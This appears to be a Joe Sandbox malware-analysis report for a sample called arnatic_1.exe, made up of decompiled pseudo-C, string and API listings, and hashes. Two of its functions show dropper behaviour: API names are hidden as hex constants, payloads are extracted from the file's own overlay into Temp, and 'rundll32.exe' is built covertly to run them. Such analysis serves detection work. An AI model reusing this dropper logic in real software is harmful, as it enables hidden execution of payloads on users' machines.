Instruction ID: d73d41cf5581fcf05edd68b3407694814d4159cd5120fd79b3bbf0d2f7224147
Opcode Fuzzy Hash: e0bc1bd19a38ab555921701737a41acaf98fd081c86205885e3da69513b1436d
Instruction Fuzzy Hash: EC124C70508381DFD720CF65C888F5BBBE8BB88344F044A6EF589AB291C7789845CF66

Uniqueness

Uniqueness Score: -1.00%

Function 00401B60, Relevance: 33.5, APIs: 1, Strings: 18, Instructions: 238
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 49%

			E00401B60() {
				intOrPtr _v524;
				intOrPtr _v528;
				intOrPtr _v532;
				char _v536;
				intOrPtr _v540;
				intOrPtr _v544;
				char _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				char _v560;
				intOrPtr _v564;
				intOrPtr _v568;
				char _v572;
				intOrPtr _v576;
				intOrPtr _v580;
				char _v584;
				intOrPtr _v596;
				intOrPtr _v600;
				char _v640;
				char _v652;
				short _v660;
				intOrPtr _v668;
				char _v676;
				intOrPtr _v684;
				intOrPtr _v704;
				intOrPtr _v708;
				char _v712;
				intOrPtr _v720;
				intOrPtr _v724;
				intOrPtr _v728;
				intOrPtr _v732;
				intOrPtr _v736;
				intOrPtr _v740;
				intOrPtr _v744;
				void* _t65;
				intOrPtr _t67;
				void* _t86;
				intOrPtr _t89;
				intOrPtr _t90;
				void* _t98;
				void* _t109;
				void* _t110;
				intOrPtr _t111;
				intOrPtr _t120;
				intOrPtr* _t133;
				void* _t134;
				void* _t135;
				intOrPtr* _t136;
				void* _t137;
				void* _t139;
				void* _t140;
				intOrPtr* _t141;
				void* _t142;
				void* _t143;
				void* _t144;
				void* _t145;
				void* _t146;
				void* _t147;
				void* _t148;
				void* _t151;
				void* _t153;

				_v584 = 0x46746547;
				_v580 = 0x53656c69;
				_v576 = 0x657a69;
				_t65 = E00401000( &_v584);
				_t144 = _t143 + 4;
				if(_t65 != 0) {
					_v572 = 0x64616552;
					_v568 = 0x656c6946;
					_v564 = 0;
					_v548 = 0x61657243;
					_v544 = 0x69466574;
					_v540 = 0x57656c;
					_v536 = 0x46746553;
					_v532 = 0x50656c69;
					_v528 = 0x746e696f;
					_v524 = 0x7265;
					_t141 = E00401000( &_v536);
					_t145 = _t144 + 4;
					if(_t141 != 0) {
						_v560 = 0x736f6c43;
						_v556 = 0x6e614865;
						_v552 = 0x656c64;
						_t67 = E00401000( &_v560);
						_t146 = _t145 + 4;
						_v600 = _t67;
						if(_t67 != 0) {
							_t133 = E00401000( &_v548);
							_t147 = _t146 + 4;
							if(_t133 != 0) {
								_t136 = E00401000( &_v572);
								_t148 = _t147 + 4;
								if(_t136 != 0) {
									_v596 = 0;
									_t134 =  *_t133(L"C:\\Users\\hardz\\AppData\\Local\\Temp\\7zS4FBAB23D\\arnatic_1.exe", 0x80000000, 1, 0, 3, 0x80, 0);
									if(_t134 != 0xffffffff) {
										 *_t141(_t134, 0xfffffff8, 0, 2);
										 *_t136(_t134,  &_v652, 8,  &_v640, 0);
										 *_t141(_t134, 0xfffffff8 - _v668, 0, 2);
										_t109 = E0040213E(_v684);
										 *_t136(_t134, _t109, _v684,  &_v676, 0);
										 *_t141(_t134, 0xfffffff8 - _v708 - _v704, 0, 2);
										_t142 = E0040213E(_v724);
										 *_t136(_t134, _t142, _v724,  &_v712, 0);
										_v736(_t134);
										_t37 = E00402547(_t109) * 2; // 0x2
										_t135 = _t109 + _t37 + 2;
										_t86 = E00402547(_t109);
										_t151 = _t148 + 0x10;
										_t137 = 0;
										_t89 = _v744 +  ~(_t86 + 1) * 2;
										_v744 = _t89;
										if(_t89 <= 0) {
											L15:
											_t90 =  *0x40bccc; // 0x0
											_t120 =  *0x40bcc8; // 0x0
											_push(_t90);
											_push(_t120);
											E00401020();
											return 1;
										} else {
											while(1) {
												_v740 =  *((intOrPtr*)(_t137 + _t135));
												_t139 = _t137 + 8;
												_v728 =  *((intOrPtr*)(_t137 + _t135 + 4));
												_t110 = _t139 + _t135;
												_t140 = _t139 + 2 + E00402547(_t110) * 2;
												_v732 = _t140 + _t135;
												_t137 = _t140 + 2 + E00402547(_t140 + _t135) * 2;
												wsprintfW( &_v660, L"%s%s", L"C:\\Users\\hardz\\AppData\\Local\\Temp\\", _t110);
												_t111 = _v732;
												_push(1);
												_push(_t111);
												_push(_t142);
												_t98 = E00401A70( &_v652);
												_t153 = _t151 + 0x28;
												if(_t98 == 0) {
													goto L11;
												}
												_t142 = _t142 + _t111;
												E00401970(_v720,  &_v652, _v724);
												_t151 = _t153 + 0xc;
												if(_t137 < _v736) {
													continue;
												} else {
													goto L15;
												}
												goto L16;
											}
											goto L11;
										}
									} else {
										L11:
										return 0;
									}
								} else {
									return 0;
								}
							} else {
								return 0;
							}
						} else {
							return 0;
						}
					} else {
						return 0;
					}
				} else {
					return _t65;
				}
				L16:
			}

0x00401b6f
0x00401b77
0x00401b7f
0x00401b87
0x00401b8c
0x00401b91
0x00401ba5
0x00401bad
0x00401bb5
0x00401bb9
0x00401bc1
0x00401bc9
0x00401bd1
0x00401bd9
0x00401be1
0x00401be9
0x00401bf6
0x00401bf8
0x00401bfd
0x00401c10
0x00401c19
0x00401c21
0x00401c29
0x00401c2e
0x00401c33
0x00401c37
0x00401c50
0x00401c52
0x00401c57
0x00401c70
0x00401c72
0x00401c77
0x00401c9b
0x00401ca1
0x00401ca6
0x00401cbb
0x00401ccb
0x00401cdd
0x00401cf0
0x00401cfc
0x00401d15
0x00401d2c
0x00401d34
0x00401d37
0x00401d42
0x00401d42
0x00401d46
0x00401d4f
0x00401d53
0x00401d57
0x00401d5c
0x00401d60
0x00401df4
0x00401df4
0x00401df9
0x00401dff
0x00401e00
0x00401e01
0x00401e18
0x00401d66
0x00401d66
0x00401d70
0x00401d74
0x00401d77
0x00401d7b
0x00401d84
0x00401d8c
0x00401da5
0x00401da9
0x00401daf
0x00401db3
0x00401db5
0x00401dbd
0x00401dbf
0x00401dc4
0x00401dc9
0x00000000
0x00000000
0x00401dde
0x00401de0
0x00401de9
0x00401dee
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00401dee
0x00000000
0x00401d66
0x00401cab
0x00401cab
0x00401cb4
0x00401cb4
0x00401c7c
0x00401c85
0x00401c85
0x00401c5c
0x00401c65
0x00401c65
0x00401c3c
0x00401c45
0x00401c45
0x00401c02
0x00401c0b
0x00401c0b
0x00401b9d
0x00401b9d
0x00401b9d
0x00000000

Strings

C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_1.exe, xrefs: 00401C96
oint, xrefs: 00401BE1
File, xrefs: 00401BAD
ileS, xrefs: 00401B77
eHan, xrefs: 00401C19
ileP, xrefs: 00401BD9
leW, xrefs: 00401BC9
%s%s, xrefs: 00401D9F
Read, xrefs: 00401BA5
SetF, xrefs: 00401BD1
ize, xrefs: 00401B7F
dle, xrefs: 00401C21
Crea, xrefs: 00401BB9
Clos, xrefs: 00401C10
C:\Users\user\AppData\Local\Temp\, xrefs: 00401D96
GetF, xrefs: 00401B6F
teFi, xrefs: 00401BC1
er, xrefs: 00401BE9

Memory Dump Source

Source File: 0000000B.00000002.306743117.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.306712579.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.306781878.0000000000407000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.306788186.0000000000409000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.306817253.000000000040B000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.306838775.000000000040D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_arnatic_1.jbxd

Similarity

API ID: AddressProc
String ID: %s%s$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_1.exe$Clos$Crea$File$GetF$Read$SetF$dle$eHan$er$ileP$ileS$ize$leW$oint$teFi
API String ID: 190572456-3243822730
Opcode ID: 95b7dbdb19dafce789322672f0d899d18dae1a9704842b63690e3844cf7dea25
Instruction ID: bd55212482fe63ffba7ab6f21ba46ad94fca1374c61f99a49cda1d88442c1819
Opcode Fuzzy Hash: 95b7dbdb19dafce789322672f0d899d18dae1a9704842b63690e3844cf7dea25
Instruction Fuzzy Hash: E4710AB16083005BD310DF69DCC1A6FB7E8EBC4754F40493EF98197290E779E9098B66

Uniqueness

Uniqueness Score: -1.00%

Function 00401970, Relevance: 19.3, APIs: 1, Strings: 10, Instructions: 60
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00401970(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				short _v4;
				short _v6;
				short _v8;
				short _v10;
				short _v12;
				short _v14;
				short _v16;
				short _v18;
				char _v20;
				short _v22;
				short _v24;
				short _v26;
				short _v28;
				intOrPtr _t22;
				WCHAR* _t24;

				_t22 = _a4;
				if(_t22 != 1) {
					if(_t22 == 2) {
						_v28 = 0;
						_v26 = 0x55;
						_v24 = 0x4e;
						_v22 = 0;
						_v20 = 0x6c;
						_v18 = 0x4c;
						_v16 = 0x33;
						_v14 = 0x32;
						_v12 = 0x2e;
						_v10 = 0x65;
						_v8 = 0x58;
						_v6 = 0x65;
						_v4 = 0;
						_t24 = E0040213E(0x410);
						 *0x40bccc = _t24;
						wsprintfW(_t24, L"\"%s\",%s", _a8, _a12);
						_v20 = 0x72;
						_v14 = 0x64;
						 *0x40bcc8 = E0040213E(0x208);
						return E00402522(_t26,  &_v20);
					}
					return _t22;
				} else {
					 *0x40bcc8 = E0040213E(0x208);
					E00402522(_t28, _a8);
					 *0x40bccc = E0040213E(0x208);
					return E00402522(_t30, _a12);
				}
			}

0x00401970
0x0040197a
0x004019ba
0x004019cc
0x004019d1
0x004019d8
0x004019df
0x004019e4
0x004019eb
0x004019f2
0x004019f9
0x00401a00
0x00401a07
0x00401a0c
0x00401a13
0x00401a18
0x00401a1d
0x00401a32
0x00401a37
0x00401a42
0x00401a49
0x00401a59
0x00000000
0x00401a65
0x00401a6b
0x0040197c
0x0040198a
0x00401991
0x004019a4
0x004019b6
0x004019b6

APIs

wsprintfW.USER32 ref: 00401A37

Strings

L, xrefs: 004019EB
d, xrefs: 00401A49
N, xrefs: 004019D8
r, xrefs: 00401A42
2, xrefs: 004019F9
U, xrefs: 004019D1
"%s",%s, xrefs: 00401A2C
3, xrefs: 004019F2
., xrefs: 00401A00
l, xrefs: 004019E4

Memory Dump Source

Source File: 0000000B.00000002.306743117.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.306712579.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.306781878.0000000000407000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.306788186.0000000000409000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.306817253.000000000040B000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.306838775.000000000040D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_arnatic_1.jbxd

Similarity

API ID: wsprintf
String ID: "%s",%s$.$2$3$L$N$U$d$l$r
API String ID: 2111968516-4189470416
Opcode ID: 6241630e9cba49262f008e06a7818f651d45ef13398db1407a0aea0a29029749
Instruction ID: 2f75a45d7af25065f1fdb0a19cb2551621b95fe71174915f0c4bdc11fdb47e84
Opcode Fuzzy Hash: 6241630e9cba49262f008e06a7818f651d45ef13398db1407a0aea0a29029749
Instruction Fuzzy Hash: F9215174928301A9D300EF65C94992F76E5FFA4304F40991EF588A73E1EBB9C648879F

Uniqueness

Uniqueness Score: -1.00%

Function 00406178, Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 50
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 46%

			E00406178(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr* _t4;
				intOrPtr* _t7;
				_Unknown_base(*)()* _t11;
				void* _t14;
				struct HINSTANCE__* _t15;
				void* _t17;

				_t14 = 0;
				_t17 =  *0x40c0b4 - _t14; // 0x0
				if(_t17 != 0) {
					L4:
					_t4 =  *0x40c0b8; // 0x0
					if(_t4 != 0) {
						_t14 =  *_t4();
						if(_t14 != 0) {
							_t7 =  *0x40c0bc; // 0x0
							if(_t7 != 0) {
								_t14 =  *_t7(_t14);
							}
						}
					}
					return  *0x40c0b4(_t14, _a4, _a8, _a12);
				}
				_t15 = LoadLibraryA("user32.dll");
				if(_t15 == 0) {
					L10:
					return 0;
				}
				_t11 = GetProcAddress(_t15, "MessageBoxA");
				 *0x40c0b4 = _t11;
				if(_t11 == 0) {
					goto L10;
				} else {
					 *0x40c0b8 = GetProcAddress(_t15, "GetActiveWindow");
					 *0x40c0bc = GetProcAddress(_t15, "GetLastActivePopup");
					goto L4;
				}
			}

0x00406179
0x0040617b
0x00406183
0x004061c7
0x004061c7
0x004061ce
0x004061d2
0x004061d6
0x004061d8
0x004061df
0x004061e4
0x004061e4
0x004061df
0x004061d6
0x00000000
0x004061f3
0x00406190
0x00406194
0x004061fd
0x00000000
0x004061fd
0x004061a2
0x004061a6
0x004061ab
0x00000000
0x004061ad
0x004061bb
0x004061c2
0x00000000
0x004061c2

APIs

LoadLibraryA.KERNEL32(user32.dll,?,00000000,00000000,00403FFD,?,Microsoft Visual C++ Runtime Library,00012010,?,0040767C,?,004076CC,?,?,?,Runtime Error!Program: ), ref: 0040618A
GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 004061A2
GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 004061B3
GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 004061C0

Strings

user32.dll, xrefs: 00406185
GetLastActivePopup, xrefs: 004061B5
GetActiveWindow, xrefs: 004061AD
MessageBoxA, xrefs: 0040619C

Memory Dump Source

Source File: 0000000B.00000002.306743117.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.306712579.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.306781878.0000000000407000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.306788186.0000000000409000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.306817253.000000000040B000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.306838775.000000000040D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_arnatic_1.jbxd

Similarity

API ID: AddressProc$LibraryLoad
String ID: GetActiveWindow$GetLastActivePopup$MessageBoxA$user32.dll
API String ID: 2238633743-4044615076
Opcode ID: 701395e4637c6f667fca26e1cd24746c97a8cb61c36e81a0957b2df284041520
Instruction ID: 0d779df33188c67cd2ee3575ee2561ae8d0c3de8a98e3dcd44805ed395181a37
Opcode Fuzzy Hash: 701395e4637c6f667fca26e1cd24746c97a8cb61c36e81a0957b2df284041520
Instruction Fuzzy Hash: 6E018431A08201DBC711DFF59EC0A2B7AE9AB58790305053FA105F62A2DA78E811DB6A

Uniqueness

Uniqueness Score: -1.00%

Function 00406527, Relevance: 13.7, APIs: 9, Instructions: 177
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E00406527(int _a4, int _a8, signed char _a9, char* _a12, int _a16, short* _a20, int _a24, int _a28, signed int _a32) {
				signed int _v8;
				intOrPtr _v20;
				short* _v28;
				int _v32;
				short* _v36;
				short* _v40;
				int _v44;
				void* _v60;
				int _t61;
				int _t62;
				int _t82;
				int _t83;
				int _t88;
				short* _t89;
				int _t90;
				void* _t91;
				int _t99;
				intOrPtr _t101;
				short* _t102;
				int _t104;

				_push(0xffffffff);
				_push(0x407768);
				_push(E00403DC8);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t101;
				_t102 = _t101 - 0x1c;
				_v28 = _t102;
				_t104 =  *0x40c0f4; // 0x1
				if(_t104 != 0) {
					L5:
					if(_a16 > 0) {
						_t83 = E0040674B(_a12, _a16);
						_pop(_t91);
						_a16 = _t83;
					}
					_t61 =  *0x40c0f4; // 0x1
					if(_t61 != 2) {
						if(_t61 != 1) {
							goto L21;
						} else {
							if(_a28 == 0) {
								_t82 =  *0x40c0ec; // 0x0
								_a28 = _t82;
							}
							asm("sbb eax, eax");
							_t88 = MultiByteToWideChar(_a28, ( ~_a32 & 0x00000008) + 1, _a12, _a16, 0, 0);
							_v32 = _t88;
							if(_t88 == 0) {
								goto L21;
							} else {
								_v8 = 0;
								E004026A0(_t88 + _t88 + 0x00000003 & 0x000000fc, _t91);
								_v28 = _t102;
								_v40 = _t102;
								_v8 = _v8 | 0xffffffff;
								if(_v40 == 0 || MultiByteToWideChar(_a28, 1, _a12, _a16, _v40, _t88) == 0) {
									goto L21;
								} else {
									_t99 = LCMapStringW(_a4, _a8, _v40, _t88, 0, 0);
									_v44 = _t99;
									if(_t99 == 0) {
										goto L21;
									} else {
										if((_a9 & 0x00000004) == 0) {
											_v8 = 1;
											E004026A0(_t99 + _t99 + 0x00000003 & 0x000000fc, _t91);
											_v28 = _t102;
											_t89 = _t102;
											_v36 = _t89;
											_v8 = _v8 | 0xffffffff;
											if(_t89 == 0 || LCMapStringW(_a4, _a8, _v40, _v32, _t89, _t99) == 0) {
												goto L21;
											} else {
												_push(0);
												_push(0);
												if(_a24 != 0) {
													_push(_a24);
													_push(_a20);
												} else {
													_push(0);
													_push(0);
												}
												_t99 = WideCharToMultiByte(_a28, 0x220, _t89, _t99, ??, ??, ??, ??);
												if(_t99 == 0) {
													goto L21;
												} else {
													goto L30;
												}
											}
										} else {
											if(_a24 == 0 || _t99 <= _a24 && LCMapStringW(_a4, _a8, _v40, _t88, _a20, _a24) != 0) {
												L30:
												_t62 = _t99;
											} else {
												goto L21;
											}
										}
									}
								}
							}
						}
					} else {
						_t62 = LCMapStringA(_a4, _a8, _a12, _a16, _a20, _a24);
					}
				} else {
					_push(0);
					_push(0);
					_t90 = 1;
					if(LCMapStringW(0, 0x100, 0x407760, _t90, ??, ??) == 0) {
						if(LCMapStringA(0, 0x100, 0x40775c, _t90, 0, 0) == 0) {
							L21:
							_t62 = 0;
						} else {
							 *0x40c0f4 = 2;
							goto L5;
						}
					} else {
						 *0x40c0f4 = _t90;
						goto L5;
					}
				}
				 *[fs:0x0] = _v20;
				return _t62;
			}

0x0040652a
0x0040652c
0x00406531
0x0040653c
0x0040653d
0x00406544
0x0040654a
0x0040654f
0x00406555
0x0040659d
0x004065a0
0x004065a8
0x004065ae
0x004065af
0x004065af
0x004065b2
0x004065ba
0x004065dc
0x00000000
0x004065e2
0x004065e5
0x004065e7
0x004065ec
0x004065ec
0x004065fc
0x0040660c
0x0040660e
0x00406613
0x00000000
0x00406619
0x00406619
0x00406624
0x00406629
0x0040662e
0x00406631
0x0040664d
0x00000000
0x00406668
0x0040667a
0x0040667c
0x00406681
0x00000000
0x00406683
0x00406687
0x004066c9
0x004066d8
0x004066dd
0x004066e0
0x004066e2
0x004066e5
0x004066ff
0x00000000
0x00406719
0x0040671c
0x0040671d
0x0040671e
0x00406724
0x00406727
0x00406720
0x00406720
0x00406721
0x00406721
0x0040673a
0x0040673e
0x00000000
0x00000000
0x00000000
0x00000000
0x0040673e
0x00406689
0x0040668c
0x00406744
0x00406744
0x00000000
0x00000000
0x00000000
0x0040668c
0x00406687
0x00406681
0x0040664d
0x00406613
0x004065bc
0x004065ce
0x004065ce
0x00406557
0x00406557
0x00406558
0x0040655b
0x00406571
0x0040658d
0x004066b5
0x004066b5
0x00406593
0x00406593
0x00000000
0x00406593
0x00406573
0x00406573
0x00000000
0x00406573
0x00406571
0x004066bd
0x004066c8

APIs

LCMapStringW.KERNEL32(00000000,00000100,00407760,00000001,00000000,00000000,74E070F0,0040C24C,?,?,?,00406919,?,?,?,00000000), ref: 00406569
LCMapStringA.KERNEL32(00000000,00000100,0040775C,00000001,00000000,00000000,?,?,00406919,?,?,?,00000000,00000001), ref: 00406585
LCMapStringA.KERNEL32(?,?,?,00406919,?,?,74E070F0,0040C24C,?,?,?,00406919,?,?,?,00000000), ref: 004065CE
MultiByteToWideChar.KERNEL32(?,0040C24D,?,00406919,00000000,00000000,74E070F0,0040C24C,?,?,?,00406919,?,?,?,00000000), ref: 00406606
MultiByteToWideChar.KERNEL32(00000000,00000001,?,00406919,?,00000000,?,?,00406919,?), ref: 0040665E
LCMapStringW.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?,00406919,?), ref: 00406674
LCMapStringW.KERNEL32(?,?,?,00000000,?,?,?,?,00406919,?), ref: 004066A7
LCMapStringW.KERNEL32(?,?,?,?,?,00000000,?,?,00406919,?), ref: 0040670F

Memory Dump Source

Source File: 0000000B.00000002.306743117.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.306712579.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.306781878.0000000000407000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.306788186.0000000000409000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.306817253.000000000040B000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.306838775.000000000040D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_arnatic_1.jbxd

Similarity

API ID: String$ByteCharMultiWide
String ID:
API String ID: 352835431-0
Opcode ID: 6b4c09f5ec2b54bd4df4d7bc5eb275f0c9a4e998703833320b1af85ce587bb3e
Instruction ID: b2b881f3559eaff85c83267aedc37117587bfe4bd3ee85ae907b64a685523162
Opcode Fuzzy Hash: 6b4c09f5ec2b54bd4df4d7bc5eb275f0c9a4e998703833320b1af85ce587bb3e
Instruction Fuzzy Hash: 0B518B31800209EBCF218F94CD45EDF7FB9FB48754F11422AF912B22A0D33A9961DB69

Uniqueness

Uniqueness Score: -1.00%

Function 00403ED9, Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 100
fileCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 96%

			E00403ED9(void* __edi, long _a4) {
				char _v164;
				char _v424;
				int _t17;
				long _t19;
				signed int _t42;
				long _t47;
				void* _t48;
				signed int _t54;
				void** _t56;
				void* _t57;

				_t48 = __edi;
				_t47 = _a4;
				_t42 = 0;
				_t17 = 0x409178;
				while(_t47 !=  *_t17) {
					_t17 = _t17 + 8;
					_t42 = _t42 + 1;
					if(_t17 < 0x409208) {
						continue;
					}
					break;
				}
				_t54 = _t42 << 3;
				_t2 = _t54 + 0x409178; // 0x7c000000
				if(_t47 ==  *_t2) {
					_t17 =  *0x40bee8; // 0x0
					if(_t17 == 1 || _t17 == 0 &&  *0x409098 == 1) {
						_t16 = _t54 + 0x40917c; // 0x40767c
						_t56 = _t16;
						_t19 = E00405620( *_t56);
						_t17 = WriteFile(GetStdHandle(0xfffffff4),  *_t56, _t19,  &_a4, 0);
					} else {
						if(_t47 != 0xfc) {
							if(GetModuleFileNameA(0,  &_v424, 0x104) == 0) {
								E00405530( &_v424, "<program name unknown>");
							}
							_push(_t48);
							_t49 =  &_v424;
							if(E00405620( &_v424) + 1 > 0x3c) {
								_t49 = E00405620( &_v424) +  &_v424 - 0x3b;
								E00406210(E00405620( &_v424) +  &_v424 - 0x3b, "...", 3);
								_t57 = _t57 + 0x10;
							}
							E00405530( &_v164, "Runtime Error!\n\nProgram: ");
							E00405540( &_v164, _t49);
							E00405540( &_v164, "\n\n");
							_t12 = _t54 + 0x40917c; // 0x40767c
							E00405540( &_v164,  *_t12);
							_t17 = E00406178( &_v164, "Microsoft Visual C++ Runtime Library", 0x12010);
						}
					}
				}
				return _t17;
			}

0x00403ed9
0x00403ee2
0x00403ee5
0x00403ee7
0x00403eec
0x00403ef0
0x00403ef3
0x00403ef9
0x00000000
0x00000000
0x00000000
0x00403ef9
0x00403efe
0x00403f01
0x00403f07
0x00403f0d
0x00403f15
0x00404006
0x00404006
0x00404011
0x00404023
0x00403f2c
0x00403f32
0x00403f4e
0x00403f5c
0x00403f62
0x00403f69
0x00403f6b
0x00403f7b
0x00403f96
0x00403f9e
0x00403fa3
0x00403fa3
0x00403fb2
0x00403fbf
0x00403fd0
0x00403fd5
0x00403fe2
0x00403ff8
0x00404000
0x00403f32
0x00403f15
0x0040402b

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104,?), ref: 00403F46
GetStdHandle.KERNEL32(000000F4,0040767C,00000000,00000000,00000000,?), ref: 0040401C
WriteFile.KERNEL32(00000000), ref: 00404023

Strings

Microsoft Visual C++ Runtime Library, xrefs: 00403FF2
Runtime Error!Program: , xrefs: 00403FAC
..., xrefs: 00403F98
<program name unknown>, xrefs: 00403F56

Memory Dump Source

Source File: 0000000B.00000002.306743117.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.306712579.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.306781878.0000000000407000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.306788186.0000000000409000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.306817253.000000000040B000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.306838775.000000000040D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_arnatic_1.jbxd

Similarity

API ID: File$HandleModuleNameWrite
String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
API String ID: 3784150691-4022980321
Opcode ID: d26a665c848d8724f3085f145bd9751cbf5e2765774d134f278ee45f97c379f8
Instruction ID: d0041a975e30e63fea96f3fa91aac92b72d09c46c3638540500ff2eadf8fc2b9
Opcode Fuzzy Hash: d26a665c848d8724f3085f145bd9751cbf5e2765774d134f278ee45f97c379f8
Instruction Fuzzy Hash: 06312472A002096FDF20EA60CD49FEB776CEB41304F6004BBF645F61D1E678AA408E5E

Uniqueness

Uniqueness Score: -1.00%

Function 004038FF, Relevance: 12.1, APIs: 8, Instructions: 132
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004038FF() {
				int _v4;
				int _v8;
				intOrPtr _t7;
				CHAR* _t9;
				WCHAR* _t17;
				int _t20;
				char* _t24;
				int _t32;
				CHAR* _t36;
				WCHAR* _t38;
				void* _t39;
				int _t42;

				_t7 =  *0x40c034; // 0x1
				_t32 = 0;
				_t38 = 0;
				_t36 = 0;
				if(_t7 != 0) {
					if(_t7 != 1) {
						if(_t7 != 2) {
							L27:
							return 0;
						}
						L18:
						if(_t36 != _t32) {
							L20:
							_t9 = _t36;
							if( *_t36 == _t32) {
								L23:
								_t41 = _t9 - _t36 + 1;
								_t39 = E00402837(_t9 - _t36 + 1);
								if(_t39 != _t32) {
									E00405A90(_t39, _t36, _t41);
								} else {
									_t39 = 0;
								}
								FreeEnvironmentStringsA(_t36);
								return _t39;
							} else {
								goto L21;
							}
							do {
								do {
									L21:
									_t9 =  &(_t9[1]);
								} while ( *_t9 != _t32);
								_t9 =  &(_t9[1]);
							} while ( *_t9 != _t32);
							goto L23;
						}
						_t36 = GetEnvironmentStrings();
						if(_t36 == _t32) {
							goto L27;
						}
						goto L20;
					}
					L6:
					if(_t38 != _t32) {
						L8:
						_t17 = _t38;
						if( *_t38 == _t32) {
							L11:
							_t20 = (_t17 - _t38 >> 1) + 1;
							_v4 = _t20;
							_t42 = WideCharToMultiByte(_t32, _t32, _t38, _t20, _t32, _t32, _t32, _t32);
							if(_t42 != _t32) {
								_t24 = E00402837(_t42);
								_v8 = _t24;
								if(_t24 != _t32) {
									if(WideCharToMultiByte(_t32, _t32, _t38, _v4, _t24, _t42, _t32, _t32) == 0) {
										E0040274E(_v8);
										_v8 = _t32;
									}
									_t32 = _v8;
								}
							}
							FreeEnvironmentStringsW(_t38);
							return _t32;
						} else {
							goto L9;
						}
						do {
							do {
								L9:
								_t17 =  &(_t17[1]);
							} while ( *_t17 != _t32);
							_t17 =  &(_t17[1]);
						} while ( *_t17 != _t32);
						goto L11;
					}
					_t38 = GetEnvironmentStringsW();
					if(_t38 == _t32) {
						goto L27;
					}
					goto L8;
				}
				_t38 = GetEnvironmentStringsW();
				if(_t38 == 0) {
					_t36 = GetEnvironmentStrings();
					if(_t36 == 0) {
						goto L27;
					}
					 *0x40c034 = 2;
					goto L18;
				}
				 *0x40c034 = 1;
				goto L6;
			}

0x00403901
0x00403910
0x00403912
0x00403914
0x00403918
0x00403950
0x004039da
0x00403a28
0x00000000
0x00403a28
0x004039dc
0x004039de
0x004039ec
0x004039ee
0x004039f0
0x004039fc
0x004039ff
0x00403a07
0x00403a0c
0x00403a15
0x00403a0e
0x00403a0e
0x00403a0e
0x00403a1e
0x00000000
0x00000000
0x00000000
0x00000000
0x004039f2
0x004039f2
0x004039f2
0x004039f2
0x004039f3
0x004039f7
0x004039f8
0x00000000
0x004039f2
0x004039e6
0x004039ea
0x00000000
0x00000000
0x00000000
0x004039ea
0x00403956
0x00403958
0x00403966
0x00403969
0x0040396b
0x0040397b
0x00403987
0x0040398e
0x00403994
0x00403998
0x0040399b
0x004039a3
0x004039a7
0x004039b8
0x004039be
0x004039c4
0x004039c4
0x004039c8
0x004039c8
0x004039a7
0x004039cd
0x00000000
0x00000000
0x00000000
0x00000000
0x0040396d
0x0040396d
0x0040396d
0x0040396e
0x0040396f
0x00403975
0x00403976
0x00000000
0x0040396d
0x0040395c
0x00403960
0x00000000
0x00000000
0x00000000
0x00403960
0x0040391c
0x00403920
0x00403934
0x00403938
0x00000000
0x00000000
0x0040393e
0x00000000
0x0040393e
0x00403922
0x00000000

APIs

